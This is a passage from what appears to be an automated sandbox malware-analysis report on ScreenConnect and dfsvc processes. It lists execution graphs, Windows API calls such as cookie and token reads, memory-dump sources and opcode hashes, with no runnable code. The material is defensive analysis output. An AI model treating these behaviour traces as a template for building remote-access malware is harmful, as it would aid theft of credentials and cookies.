LoadLibraryExW 26448->26449 26450 7ff848f7758c 26448->26450 26449->26450 26450->26445 26526 7ff848f436d7 26527 7ff848f436e3 26526->26527 26530 7ff848f42f80 26527->26530 26529 7ff848f4370a 26531 7ff848f458a0 26530->26531 26532 7ff848f42f00 LoadLibraryExW 26531->26532 26533 7ff848f45929 26532->26533 26533->26529 26451 7ff848f43d36 26452 7ff848f43d3d 26451->26452 26455 7ff848f42e48 26452->26455 26454 7ff848f43e2a 26456 7ff848f43e70 26455->26456 26459 7ff848f42e08 26456->26459 26458 7ff848f43e8a 26458->26454 26460 7ff848f43f30 26459->26460 26461 7ff848f415c8 LoadLibraryExW 26460->26461 26462 7ff848f43f55 26461->26462 26462->26458 26512 7ff848f434b6 26517 7ff848f42f68 26512->26517 26514 7ff848f43c81 LoadLibraryExW 26515 7ff848f4378e 26514->26515 26516 7ff848f434cb 26516->26514 26519 7ff848f42f6d 26517->26519 26518 7ff848f42f84 26518->26516 26519->26518 26522 7ff848f42f00 26519->26522 26521 7ff848f45929 26521->26516 26523 7ff848f45990 26522->26523 26524 7ff848f43f30 LoadLibraryExW 26523->26524 26525 7ff848f459b4 26523->26525 26524->26525 26525->26521 26490 7ff848f44b75 26491 7ff848f44b7f 26490->26491 26492 7ff848f43f30 LoadLibraryExW 26491->26492 26493 7ff848f44bad 26492->26493 26534 7ff848f4fcd2 26535 7ff848f4fcff InternetGetCookieW 26534->26535 26537 7ff848f4fec9 26535->26537
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2984382940.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff848f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: x]k-
                                                                                                                                                                                                                                                    • API String ID: 0-679281813
                                                                                                                                                                                                                                                    • Opcode ID: 0daef6d356cebc546d8498420ce40fcb6e0a8406d51c26d3bf513553b5a7247b
                                                                                                                                                                                                                                                    • Instruction ID: 902e09b0c2e0d2e21d1e59d1372921090975087cba5baede93d11de0d9665db2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0daef6d356cebc546d8498420ce40fcb6e0a8406d51c26d3bf513553b5a7247b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CB11331E0DAC90FE356EB7858192B87FD1EF66650F0801BFC089D71E7EB28A8858345
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2984382940.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff848f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookieInternet
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 930238652-0
                                                                                                                                                                                                                                                    • Opcode ID: e679ba02d242cf7a187a622790515d0d5de55682f5d8e5cacb1fc38ac04b4767
                                                                                                                                                                                                                                                    • Instruction ID: 5a80f6aa2296e7148be245a683788188b270b123f742cb0365541a7a03ad342d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e679ba02d242cf7a187a622790515d0d5de55682f5d8e5cacb1fc38ac04b4767
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42918D30508A8D4FEB69EF2888557E93BE1EF69311F04426FE84DC7292CB74A9458B91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2984382940.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff848f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                    • Opcode ID: b325cc8ca1e7c2826ca6a0d1d28388cad2d8b5a6a881f31832437d39ef6be078
                                                                                                                                                                                                                                                    • Instruction ID: 432401925882081ada7a5df16d95f274b10f6a0c0a128d355e8f5185ebb55a57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b325cc8ca1e7c2826ca6a0d1d28388cad2d8b5a6a881f31832437d39ef6be078
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5351C371A0CA5C8FDB59EF689845BE97BE0FB69310F1441AFD04DD3292CB34A845CB85
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2984024702.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff848e2d000_dfsvc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e3004314e05ea4924f59dd9293f51160035b2df6ebe0b36be58cf5326f19880d
                                                                                                                                                                                                                                                    • Instruction ID: b68e39dbb8d43ff749d54df64869960cbc42895d452c9bbcd60b0f7101db053e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3004314e05ea4924f59dd9293f51160035b2df6ebe0b36be58cf5326f19880d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41F23180DBC58FE3569B2898459623FF0FF57360B1502EFD088CB1A7D629A846C7A2

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:12.9%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:12
                                                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                                                    execution_graph 11185 7ff848f084b8 11186 7ff848f084bf SetProcessMitigationPolicy 11185->11186 11188 7ff848f08552 11186->11188 11181 7ff848f0f67b 11182 7ff848f0f687 CreateFileW 11181->11182 11184 7ff848f0f7bc 11182->11184 11189 7ff848f04890 11190 7ff848f04899 GetTokenInformation 11189->11190 11192 7ff848f1f2d7 11190->11192 11193 7ff848f03dfa 11194 7ff848f1f470 CloseHandle 11193->11194 11196 7ff848f1f4eb 11194->11196

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 192 7ff848f04890-7ff848f048d9 198 7ff848f048dc 192->198 198->198 199 7ff848f048de-7ff848f04949 198->199 207 7ff848f0494c 199->207 207->207 208 7ff848f0494e-7ff848f1f2d5 GetTokenInformation 207->208 214 7ff848f1f2dd-7ff848f1f30e 208->214 215 7ff848f1f2d7 208->215 215->214
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                                                                                                                    • Opcode ID: a21c05b1de95faf72b6b0abe6da4cbb8a78debbed52844fe96befae404a0fd24
                                                                                                                                                                                                                                                    • Instruction ID: 7893b7d18bd16ee9f820740d4bb942e3dd74819571554a0bb45d3d1d9ed742aa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a21c05b1de95faf72b6b0abe6da4cbb8a78debbed52844fe96befae404a0fd24
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5612C72E0DAC54FE3199B6C68052B97BE1FFA6718F1401BFD048871DBDA389D058395

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 305 7ff848f0f67b-7ff848f0f710 310 7ff848f0f71a-7ff848f0f7ba CreateFileW 305->310 311 7ff848f0f712-7ff848f0f717 305->311 313 7ff848f0f7bc 310->313 314 7ff848f0f7c2-7ff848f0f7f5 310->314 311->310 313->314
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                    • Opcode ID: b12934009d2df700793d96b2ff6e5ec7b176a6b134338b9191a4300dc9877bff
                                                                                                                                                                                                                                                    • Instruction ID: ac31c128305e6dd1e34e6f6dd7ded2239a569107cce0daa9e9f8c6450167bc2c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b12934009d2df700793d96b2ff6e5ec7b176a6b134338b9191a4300dc9877bff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8451D03090CA4C8FDB58EF589845BE9BBE0FB59310F0442AEE04DD3292CB34A885CB81

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 316 7ff848f084b8-7ff848f08550 SetProcessMitigationPolicy 319 7ff848f08558-7ff848f08587 316->319 320 7ff848f08552 316->320 320->319
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                    • Opcode ID: 7801abe3373e20e85d4d6fccd32d7654c965204d3e3f1190104e5353e37174ca
                                                                                                                                                                                                                                                    • Instruction ID: 972cc4d727ee8d078c031c8eda9dd7899b027790a62c85648558c191f9646bf7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7801abe3373e20e85d4d6fccd32d7654c965204d3e3f1190104e5353e37174ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C831C53191CB188FDB28AF9C9C4A5F97BE0EB55711F00413EE049D3652DB74A8458B85

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 322 7ff848f03eaa-7ff848f084ef 324 7ff848f084f6-7ff848f08550 SetProcessMitigationPolicy 322->324 325 7ff848f08558-7ff848f08587 324->325 326 7ff848f08552 324->326 326->325
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                    • Opcode ID: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
                                                                                                                                                                                                                                                    • Instruction ID: 45ec69a0a0197159bb44043d5f5f0a7e7cea61e5586f5d73d0e1903caf9c17de
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC21D53191CB188FDB18AF9CDC4AAFA7BE0EB59711F00413EE04AD3651DB74B8458B95

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 426 7ff848f03dfa-7ff848f1f4e9 CloseHandle 429 7ff848f1f4eb 426->429 430 7ff848f1f4f1-7ff848f1f51f 426->430 429->430
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                    • Opcode ID: 9c647c9c32868dc47efbc9d8272ceccc62eb8a5bc0171a5312393f4ff219b868
                                                                                                                                                                                                                                                    • Instruction ID: 75b73ff2f4591a2534c0258a70bfc484c10ee4e067baea6f84b65be19dbee008
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c647c9c32868dc47efbc9d8272ceccc62eb8a5bc0171a5312393f4ff219b868
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4721C131908A1C9FDB58DF98C449BF9BBE0FBA5321F00422ED04ED3651DB74A856CB90
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: nCuq$
                                                                                                                                                                                                                                                    • API String ID: 0-3867085953
                                                                                                                                                                                                                                                    • Opcode ID: 9c9403a504720413b0f59b4a53a52f5696bc257f8fbb7cb28092af7e7a43a898
                                                                                                                                                                                                                                                    • Instruction ID: 9fa639dc5af76d2fd94d71d1d67814a8f470f2193405c7eaece54585bfc4fbcc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c9403a504720413b0f59b4a53a52f5696bc257f8fbb7cb28092af7e7a43a898
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 895191347006018FC715EB74D95966EBBF2EF94310B1884A9D40ADB3A5EF75DC06CBA1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $]q$$]q
                                                                                                                                                                                                                                                    • API String ID: 0-127220927
                                                                                                                                                                                                                                                    • Opcode ID: 7aed2ef71c57328db855deb6585d7e5e4b15a35db8e387c70912f24db37f89de
                                                                                                                                                                                                                                                    • Instruction ID: 5490e5a07578d4e3e9e8cf02c5bb9419c8fe0d4743713b793d4bc3001548278e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7aed2ef71c57328db855deb6585d7e5e4b15a35db8e387c70912f24db37f89de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6031223A60D3809FC70B9B7498685553FB1DF8731031E44EBD884CB2B3DA258C0ACBA2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (aq
                                                                                                                                                                                                                                                    • API String ID: 0-600464949
                                                                                                                                                                                                                                                    • Opcode ID: 730b2311cf6063c6db56bf5dbb9f76352ea22e9f0c1e6ed11b24fccfcc7697bb
                                                                                                                                                                                                                                                    • Instruction ID: b7ceefebeddd72e6c63afc18e8a7c93cc103f33bc81943f127821de972c490aa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 730b2311cf6063c6db56bf5dbb9f76352ea22e9f0c1e6ed11b24fccfcc7697bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C611934B106198FCB14DFA9E994A5EB7F2FF8D315B1580A8E5069B369DB30EC02DB50
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: LR]q
                                                                                                                                                                                                                                                    • API String ID: 0-3081347316
                                                                                                                                                                                                                                                    • Opcode ID: 93ea35266bd84023e269ee0c293678c2599f19cb28ba18d8ad9808912511afb0
                                                                                                                                                                                                                                                    • Instruction ID: 6cb696904b7149c445d3e438807bb18bb897f910bee71cd0ec87d0b77b7ca594
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93ea35266bd84023e269ee0c293678c2599f19cb28ba18d8ad9808912511afb0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE51F230A082159FDB259B74D954B6EBBF2EF84304F14896EE446DB3A1EB30DC45CBA1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (aq
                                                                                                                                                                                                                                                    • API String ID: 0-600464949
                                                                                                                                                                                                                                                    • Opcode ID: 6734c2d54c38a13655bbc882670f340f5e9639bf638ff648e9eb9baa006e779f
                                                                                                                                                                                                                                                    • Instruction ID: 74d207a5be2034375de08b842fcc2bc932fc441178b4e1aa4732cba2f7a0b714
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6734c2d54c38a13655bbc882670f340f5e9639bf638ff648e9eb9baa006e779f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8841AF30A00105CBDB15EF68E9946ADBFB6EF84310B14C569D9059B366DF74EC07CBA0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ['
                                                                                                                                                                                                                                                    • API String ID: 0-410297704
                                                                                                                                                                                                                                                    • Opcode ID: 10aac1781802117cc88f54b1cb90aaf5b165a6079dde7fe6909432bed3272455
                                                                                                                                                                                                                                                    • Instruction ID: 5ed1369d6234c2dabd14127604e20b4ee702c1f0c0e9f358d1526216f670e5b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10aac1781802117cc88f54b1cb90aaf5b165a6079dde7fe6909432bed3272455
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B331E5387006014B8705AB7DAC9165FB7E6EFC93103148579D51ADB398EFB4EE098BD2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 25563d655a9e2d582a71e643c643d743fe45a80ad6fe90e667be23840b5a77e2
                                                                                                                                                                                                                                                    • Instruction ID: ff12200d32a6a4d681254aeaf95c1fc359e2bce10eb5c872d84ed08bb9467520
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25563d655a9e2d582a71e643c643d743fe45a80ad6fe90e667be23840b5a77e2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04518030E043099FDB05EFB8DC54B9DBBB2FF89300F148559E104AB2A5EB74A985CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1314a68c07fe7d0607b00c48e375e625ebacb1ef772dfcaaeb12458811dbe99f
                                                                                                                                                                                                                                                    • Instruction ID: 0ae9f19f07705e6a0bbd11a7b422583f7201d7227710820d2e6eaef471632bb0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1314a68c07fe7d0607b00c48e375e625ebacb1ef772dfcaaeb12458811dbe99f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C510734640B01CFC724CF69D984A66B7F2FF89324B244A6DD49ADB7A4DB31E806CB54
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a46d66c7d1d24a63ea1738f196ffef17c70fd4bd52cc3b08abb59f6a6465e8ec
                                                                                                                                                                                                                                                    • Instruction ID: 79783a9875a1ebcb33096004a5c08935dfba955f7f9a8789a93086403fdc0455
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a46d66c7d1d24a63ea1738f196ffef17c70fd4bd52cc3b08abb59f6a6465e8ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3519F746007058FCB34CF69D844A6ABBF1FF94311B144A29D056CB7A1D730EE4ACBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7a4f0a2aed01922cf57122fcf37d58af8bac2f88b6bea82b6d7f1195622c7d62
                                                                                                                                                                                                                                                    • Instruction ID: 0284da4e1c0339a2300e4626238cee707742aa99e89fb617df460265f2547f5b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a4f0a2aed01922cf57122fcf37d58af8bac2f88b6bea82b6d7f1195622c7d62
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A651A334E043099FCB05EFB8DC44B9DBBB6FF89300F108559E404AB2A5DB74A985DB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5667a6ad65975bfdf13cb64172150026065b2ed7264f32a896decea81ee8d5ad
                                                                                                                                                                                                                                                    • Instruction ID: 61ad25fce7e1128dfe2f271d305fff2e9250c7ec7eb6258197f87366ad927998
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5667a6ad65975bfdf13cb64172150026065b2ed7264f32a896decea81ee8d5ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0951A1B4A007058FC734DF79D9846AABBF1FF45311B144A69D056CB7A1D730E94ACBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c653a397c7d49b12d97f7e3afc48a5ece38e9d02a3bb1a0094009eef4ad64106
                                                                                                                                                                                                                                                    • Instruction ID: 852964e79945d762eb4300bcb21971c8e66aa7cdb8c36b7c8829041177568fcd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c653a397c7d49b12d97f7e3afc48a5ece38e9d02a3bb1a0094009eef4ad64106
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24416CB4A00705CFDB74DF69D944A6ABBF1FF94310B144A28D456C77A0D730EA49CBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2c74147af4de43dc4988da2b3562ed95cd9c7be37ab47f41908130c90e491ff0
